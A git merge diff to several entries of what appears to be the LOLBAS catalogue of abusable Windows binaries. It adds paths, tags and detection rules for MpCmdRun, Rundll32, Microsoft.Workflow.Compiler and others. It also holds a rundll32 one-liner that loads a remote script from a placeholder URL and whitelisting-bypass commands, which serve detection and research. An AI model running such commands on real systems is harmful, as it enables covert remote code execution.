Merge remote-tracking branch 'origin/master' into push-request3

yml/OSBinaries/Microsoft.Workflow.Compiler.yml

@@ -11,10 +11,20 @@ Commands:
     Privileges: User
     MitreID: T1127
     OperatingSystem: Windows 10S, Windows 11
+    Tags:
+      - Execute: VB.Net
+      - Execute: Csharp
+  - Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}
+    Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
+    Usecase: Compile and run code
+    Category: Execute
+    Privileges: User
+    MitreID: T1127
+    OperatingSystem: Windows 10S, Windows 11
     Tags:
       - Execute: XOML
   - Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}
-    Description: Compile and execute C# or VB.net code in a XOML file referenced in the first argument (any extension accepted).
+    Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
     Usecase: Compile and run code
     Category: AWL Bypass
     Privileges: User

yml/OSBinaries/MpCmdRun.yml

@@ -29,6 +29,9 @@ Full_Path:
   - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
   - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
   - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
+  - Path: C:\Program Files\Windows Defender\MpCmdRun.exe
+  - Path: C:\Program Files (x86)\Windows Defender\MpCmdRun.exe
+  - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23110.3-0\X86\MpCmdRun.exe
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml
   - Elastic: https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml

yml/OSBinaries/OneDriveStandaloneUpdater.yml

@@ -13,6 +13,8 @@ Commands:
     OperatingSystem: Windows 10
 Full_Path:
   - Path: 'C:\Users\<username>\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'
+  - Path: C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe
+  - Path: C:\Program Files (x86)\Microsoft OneDrive\OneDriveStandaloneUpdater.exe
 Detection:
   - IOC: HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL
   - IOC: Reports of downloading from suspicious URLs in %localappdata%\OneDrive\setup\logs\StandaloneUpdate_*.log files

yml/OSBinaries/Rundll32.yml

@@ -23,13 +23,6 @@ Commands:
     Tags:
       - Execute: DLL
       - Execute: Remote
-    Usecase: Proxy execution
-    Category: Execute
-    Privileges: User
-    MitreID: T1218.011
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-    Tags:
-      - Execute: JScript
   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:{REMOTEURL}")
     Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
     Usecase: Execute code from Internet

yml/OSBinaries/Runscripthelper.yml

@@ -19,8 +19,8 @@ Full_Path:
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml
   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
-  - IOC: Event 4014 - Powershell logging
-  - IOC: Event 400
+  - IOC: Event ID 4104 - Microsoft-Windows-PowerShell/Operational
+  - IOC: Event ID 400 - Windows PowerShell
 Resources:
   - Link: https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
 Acknowledgement:

yml/OSBinaries/Wuauclt.yml

@@ -15,6 +15,7 @@ Commands:
       - Execute: DLL
 Full_Path:
   - Path: C:\Windows\System32\wuauclt.exe
+  - Path: C:\Windows\UUS\amd64\wuauclt.exe
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml
   - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml

yml/OSBinaries/msedgewebview2.yml

@@ -42,6 +42,7 @@ Commands:
       - Execute: CMD
 Full_Path:
   - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe
+  - Path: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml
   - IOC: 'msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path'

yml/OtherMSBinaries/OpenConsole.yml

@@ -17,6 +17,7 @@ Full_Path:
   - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
   - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe
   - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
+  - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.18.10301.0_x64__8wekyb3d8bbwe\OpenConsole.exe
 Detection:
   - IOC: OpenConsole.exe spawning unexpected processes
   - Sigma: https://github.com/SigmaHQ/sigma/blob/9e0ef7251b075f15e7abafbbec16d3230c5fa477/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml